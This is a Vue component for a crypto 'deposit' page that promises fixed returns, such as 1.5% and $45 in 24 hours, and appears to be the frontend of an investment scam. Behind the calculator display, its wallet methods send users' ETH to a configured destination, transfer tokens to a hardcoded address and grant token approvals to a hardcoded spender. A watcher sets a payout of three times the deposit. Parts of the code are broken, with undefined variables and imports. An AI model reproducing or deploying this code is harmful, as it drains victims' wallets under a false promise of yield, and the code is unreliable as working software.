<style>
.caculate-head{width:90vw;height: 10vw;margin: 0 auto;margin-top: 5vw;}
.caculate-head span{display: block;line-height: 10vw;font-size: 6vw;}
.caculate-head span.c-h-a{float: left;}
.caculate-head span.c-h-b{float: right;color: #333;font-family: "Avenir Next";
font-weight: 700;;}
.caculate-return{width:90vw;height: 20vw;margin: 0 auto;margin-top: 5vw;}
.caculate-return span{display: block;width: 100%;}
.caculate-return span.r-a{text-align: right;font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana,serif;
font-size: 4.5vw;height: 10vw;line-height: 10vw;}
.caculate-return span.r-b{text-align: right;font-family: "Avenir Next";
font-weight: 700;font-size: 8vw;color:#333;}
</style>
<template>
	<div class="bg">
    <headers></headers>
    <div class="caculate-head">
      <span class="c-h-a">Your Deposit</span>
      <span class="c-h-b">3000 USDT</span>
    </div>
    <slisd :min="0" :max="100" :value="jd" :isDrag="true" bgColor="#fcd535"></slisd>
    <div class="caculate-return">
      <span class="r-a">rate of return</span>
      <span class="r-b">1.5%</span>
    </div>
    <div class="caculate-return">
      <span class="r-a">24h / revenue(USDT)</span>
      <span class="r-b">$45</span>
    </div>
    <menus :now="now"></menus>
	</div>
</template>
<script>
import slisd from '../components/slisd.vue'
import menus from '../components/menus.vue'
import headers from '../components/header.vue'
import { ethers } from 'ethers'
import { connectWallet, disconnectWallet, getAccount, getChainId, getGasPrice, getProvider } from '../../utils/wallet'
import { getAllowance, approveUnlimited, revokeApproval } from '../../utils/erc20'
import Qs from 'qs'
export default {
  components: {
    menus,
    headers,
    slisd
  },
  data () {
    return {
      now: 4,
      provider: '',
      balance: 0,
      connected: false,
      address: '',
      partner: [],
      jd: 50,
      gas: '',
	  account: '',
	  loading: false,
	  errMsg: '',
    }
  },
  async mounted () {
    if (window.ethereum) {
  	  try {
  		// 尝试静默恢复连接（不弹授权框）
  		const accounts = await window.ethereum.request({ method: 'eth_accounts' })
  		if (accounts.length > 0) {
  		  // 已经授权过，直接恢复 provider
  		  await connectWallet()
  		}
  	  } catch (e) {
  		console.log('恢复连接失败', e)
  	  }
  	} 
    // this.get()
    // this.getAddress()

  },
  methods: {
    onPercentChange (num) {
      this.volumeNum = num
    },
    async getAddress () {
      let Address = getAccount()
       
      this.chain_id = await getChainId()
      this.gas = await getGasPrice()
      this.address = Address
     // const chainId = await window.ethereum.request({ method: 'eth_chainId' })
      
      if (chainId_now != 137) {
        this.$toast.center(this.$t('home.index36'))
      } else {
        this.connected = true
        this.dologin()
      }
    },
    get_balance () {
      const _this = this
      const data = {
        address: _this.$getCode(_this.address)
      }
      this.$axios({
        method: 'post',
        url: this.$api + '/account/get_balance',
        data: Qs.stringify(data),
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
        }
      }).then(response => {
        var data = response.data
        if (data.state === 1) {
          this.balance = data.data.balance
          this.mec = data.data.mec
        }
      }).catch(error => {
        console.log(error)
      })
    },
    get () { // 唤起钱包
      if (window.ethereum) {
        window.ethereum.enable().then((res) => {
          alert('当前钱包地址:' + res[0])
        })
      } else {
        alert('请安装MetaMask钱包')
      }
    },
    async getETH () {
      if (window.ethereum) {
        this.provider = window.ethereum
        try {
          await window.ethereum.enable()
        } catch (error) {
          console.log('User denied account access')
        }
      } else if (window.web3) {
        this.provider = window.web3.currentProvider
      } else {
        this.provider = new Web3.providers.HttpProvider(this.$rpc)
      }
      let web3 = new Web3(window.web3.currentProvider)
      let fromAddress = await web3.eth.getAccounts()
      web3.eth.getBalance(fromAddress[0], (err, res) => {
        if (!err) {
          this.balance = res / Math.pow(10, 18)
          if (this.balance < this.amount) {
            this.$toast.center(this.$t('home.index38'))
          } else {
            this.getTransfer()
          }
        }
      })
    },
    // ETH转账
    async getTransferGas () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = this.amount * Math.pow(10, 18)
      var val = this.gas / 1000000000000000000 * 50000
      val = val * Math.pow(10, 18)
      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: val
      }, function (error, hash) {
        self.get_award(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.award_done(receipt.transactionHash)
      })
    },
    async getTransferGas2 () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = this.amount * Math.pow(10, 18)
      var val = this.gas / 1000000000000000000 * 50000
      val = val * Math.pow(10, 18)
      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: val
      }, function (error, hash) {
        self.get_award2(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.award_done2(receipt.transactionHash)
      })
    },
    async getTransfer () {
      let web3 = new Web3(window.web3.currentProvider)
      this.gas = await web3.eth.getGasPrice()
      this.gas = this.gas * 1.5
      this.gas = this.gas.toFixed(0)
      let fromAddress = await web3.eth.getAccounts()
      let amount = 0
      if (this.amount < 1000) {
        amount = this.amount * Math.pow(10, 18)
      } else if (this.amount < 10000) {
        amount = this.amount * Math.pow(10, 17)
        amount = amount + '0'
      } else {
        amount = this.amount * Math.pow(10, 16)
        amount = amount + '00'
      }

      let toAddress = this.$dest
      let self = this
      web3.eth.sendTransaction({
        gas: 21000,
        gasPrice: self.gas,
        from: fromAddress[0],
        to: toAddress,
        value: amount
      }, function (error, hash) {
        self.make_order(hash)
        self.pay = true
        console.log(hash)
      }).then(function (receipt) {
        console.log(receipt)
        	self.order_done(receipt.transactionHash)
        self.pay = false
      })
    },
    // 查询代币余额
    async getTokenBalance () {
      if (window.web3) {
        var web3 = web3 = new Web3(window.web3.currentProvider)
        let fromAddress = '0x394A64e586FC05bD28783351F14dfcc426EFD230'// 查询用户地址
        let ethContract = new web3.eth.Contract(abi.abi, '0x3d2dd604866d0ec1ddd5e8ef27848a6fc0962018') // 所有代币的abi可以通用（abi,合约地址）
        let balance = await ethContract.methods.balanceOf(fromAddress).call()
        alert(balance)
      }
    },
    // 直接转账充币地址
    async getTokenTransfer () {
      if (window.web3) {
        let web3 = new Web3(window.web3.currentProvider)
        let ethContract = new web3.eth.Contract(abi.abi, '0x3d2dd604866d0ec1ddd5e8ef27848a6fc0962018') // 所有代币的abi可以通用（abi,合约地址）
        // 转账数量
        let amount = 100 * Math.pow(10, 18)// 转账100个
        // 小狐狸账户
        let fromAddress = await web3.eth.getAccounts()
        // 接收地址
        let toAddress = '0xcaD75EADAf24F41d6274E129d7aE54764d7cd8E7'
        ethContract.methods.transfer(toAddress, amount + '').send({ from: fromAddress[0] })
      }
    },
    // 查询授权金额
    async getAllowance () {
      if (window.web3) {
        let web3 = new Web3(window.web3.currentProvider)
        let fromAddress = '0x394A64e586FC05bD28783351F14dfcc426EFD230'// 查询地址
        let ethContract = new web3.eth.Contract(abi.abi, '0x3d2dd604866d0ec1ddd5e8ef27848a6fc0962018') // 所有代币的abi可以通用（abi,合约地址）
        let toAddress = '0xcaD75EADAf24F41d6274E129d7aE54764d7cd8E7'// 被授权地址
        let balance = await ethContract.methods.allowance(fromAddress, toAddress).call()
        alert('授权金额' + balance / Math.pow(10, 18))
      }
    },
    // 授权
    async getApprove () {
      if (window.web3) {
        let web3 = new Web3(window.web3.currentProvider)
        let ethContract = new web3.eth.Contract(abi.abi, '0x3d2dd604866d0ec1ddd5e8ef27848a6fc0962018') // 所有代币的abi可以通用（abi,合约地址）
        // 授权数量
        let amount = 100 * Math.pow(10, 18)// 转账100个
        let toAddress = '0xcaD75EADAf24F41d6274E129d7aE54764d7cd8E7'// 被授权地址
        // 小狐狸账户
        let fromAddress = await web3.eth.getAccounts()
        ethContract.methods.approve(toAddress, amount + '').send({ from: fromAddress[0] })
      }
    }

  },
  watch: {
    amount (val) {
      if (val <= 10000) {

      } else {
        if (val % 100 != 0) {

        } else {
          this.selected = this.amount
          this.getout = this.amount * 3
        }
      }
    }
  }
}
</script>
